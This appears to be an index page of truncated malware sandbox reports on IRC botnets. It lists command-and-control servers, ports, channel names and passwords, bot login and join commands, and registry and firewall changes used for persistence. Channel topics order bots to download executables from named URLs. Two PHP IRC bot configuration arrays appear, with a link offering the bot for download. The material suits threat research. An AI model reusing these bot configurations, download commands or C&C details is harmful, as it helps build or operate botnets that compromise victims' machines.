add.e2doo.net:2345 chanel:#imb test wd53 cambia il topic in ‘.msn.stop|.msn.msg foto 😀 http://dondererphoto.com/showimage.php?=’ browseusers.myspace.com browseusers.myspace.com 216.178.38.168 x.myspacecdn.com x.myspacecdn.com 212.201.100.169 myspace.ivwbox.de myspace.ivwbox.de 193.46.63.103 cms.myspacecdn.com cms.myspacecdn.com 212.201.100.169 UDP Connections Remote IP Address: 127.0.0.1 Port: 1089 Send Datagram: 20 packet(s) of size 1 Recv Datagram: 20 packet(s) of size 1 Download URLs http://216.178.38.168/Browse/Browse.aspx (browseusers.myspace.com) http://212.201.100.169/modules/common/static/css/uploadcontrol_ioe1imsn.css (x.myspacecdn.com) http://212.201.100.169/modules/browse/static/css/browse_qzzglnfy.css (x.myspacecdn.com) http://212.201.100.169/modules/common/static/img/header/header001.pngRead more...

Remote Host Port Number 216.246.99.115 1234 NICK n[USA|XP]8338762 USER 9111 “” “lol” :9111 JOIN #dl# PONG 422 * The following port was open in the system: Port Protocol Process 1053 TCP secfil.exe (%Windir%secfil.exe) Registry Modifications * The following Registry Value was modified: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon] + Userinit = Memory Modifications * There was a newRead more...

Resolved : [cx10man.weedns.com] To [79.113.167.139] Resolved : [cx10man.weedns.com] To [67.202.215.250] Resolved : [cx10man.weedns.com] To [210.166.223.51] Resolved : [cx10man.weedns.com] To [203.136.50.155] Resolved : [cx10man.weedns.com] To [62.193.249.122] Resolved : [cx10man.weedns.com] To [210.127.253.90] Remote Host Port Number 210.127.253.90 3305 NICK P|uz2kln8y2 USER ovoe6avbz * 0 :USA|XP|590 USERHOST P|uz2kln8y2 MODE P|uz2kln8y2 JOIN #mm RSA PRIVMSG #mm :+Cpiwe/Bec9E07RQ/c0vtb4S//EdYX/xXUDj093Z0X0JV7.c0ys0/7/xwG5K1ha85306R4h2/YHwTF/PxQdA067AvB/I3dvk159vvk//p1d3/tEsA/0b7FNk0cuplp14Otlj1MT7lW/KzwsA.RKUWp.jZL2z0EkS7/.wqp6e1 PRIVMSG #mmRead more...

mile.dbsarticles.com 205.234.222.37 * C&C Server: 205.234.222.37:2345 * Server Password: * Username: XP-0642 * Nickname: NEW-[DEU|00|P|85489] * Channel: #imb (Password: test) * Channeltopic: :.msn.stop|.msn.msg foto 😀 http://expensiveimages.com/image.php?= Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList “c:IM35616.JPGwww.myspace.com.exe” = c:IM35616.JPGwww.myspace.com.exe:*:Enabled:Firewall Administrating HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList “c:IM35616.JPGwww.myspace.com.exe” = C:WINDOWSinfocard.exe:*:Enabled:Firewall Administrating HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Firewall Administrating” = C:WINDOWSinfocard.exe HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “Firewall Administrating” = C:WINDOWSinfocard.exeRead more...

Remote Host Port Number 204.0.5.34 80 204.0.5.41 80 204.0.5.49 80 204.0.5.51 80 204.0.5.58 80 216.178.38.103 80 216.178.38.168 80 63.135.86.30 80 63.135.86.39 80 64.210.61.214 80 64.202.120.57 2345 ircd here * The data identified by the following URLs was then requested from the remote web server: o http://1.download.advertise.myspace.com/upld/cs/1//cs4_lb_1705_.jpg o http://1.download.advertise.myspace.com/upld/cs/1//cs3_sk_3469_.jpg o http://x.myspacecdn.com/modules/common/static/css/global_dbasuqgy.css o http://x.myspacecdn.com/modules/common/static/css/uploadcontrol_ioe1imsn.css o http://x.myspacecdn.com/modules/browse/static/css/browse_qzzglnfy.css oRead more...

Remote Host Port Number 85.12.60.20 81 NICK n[USA|XP]5266080 USER n “” “lol” :n JOIN #control# PONG 422 PONG :request.not.found Other details * The following port was open in the system: Port Protocol Process 1053 TCP winvsnc.exe (%AppData%winvsnc.exe) Registry Modifications * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + WindowsUpdateControl = “%AppData%winvsnc.exe” so that winvsnc.exeRead more...

var $config = array(“server”=>”207.58.186.227”, “port”=>7000, “pass”=>””, //senha do server “prefix”=>”[B]”, “maxrand”=>4, “chan”=>”#crack”, “key”=>”tow”, //senha do canal “modes”=>”+p”, “password”=>”la”, //senha do bot “trigger”=>”.”, “hostauth”=>”*” // * for any hostname here u can download this php bot: http://stashbox.org/866727/stla.txt

ktodumal.net 85.12.60.20 C&C Server: 85.12.60.20:81 Server Password: Username: n Nickname: n[DEU|XP]0949985 Channel: #new# (Password: ) Channeltopic: :.im http://www.veyrandon-camions-magasins.fr/img/fotos.php?foto=IMG020407202010.JPG Now talking in #inf# Topic is ‘.dl http://veyrandon-camions-magasins.fr/admin/n.exe’ Set by s on Thu Apr 22 05:11:24 also chanel :#newgen# Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList “C:Dokumente und EinstellungenAdministratorAnwendungsdatenwinvsn.exe” = C:Dokumente und EinstellungenAdministratorAnwendungsdatenwinvsn.exe:*:Enabled:Windows ControlRead more...

server”=>”218.226.193.174″, “port”=>4242, “pass”=>””, // “prefix”=>””, “maxrand”=>7, “chan”=>”##xp#”, “key”=>”142536”, // “modes”=>”-x+i”, “password”=>”stop”, // “trigger”=>”!say@”, “hostauth”=>”*” // *

[ DetectionInfo ] * Filename: C:analyzerscansvcnost.exe. * Sandbox name: W32/Backdoor. * Signature name: Ircbot.BAYQ. * Compressed: NO. * TLS hooks: NO. * Executable type: Application. * Executable file structure: OK. * Filetype: PE_I386. [ General information ] * File length: 73728 bytes. * MD5 hash: a9bfb1db9d131e1bcce5b8f1f3132871. * SHA1 hash: e7e8d1ce421b418a31180beb25a3e758265ea9c7. * Entry-point detection: Microsoft VisualRead more...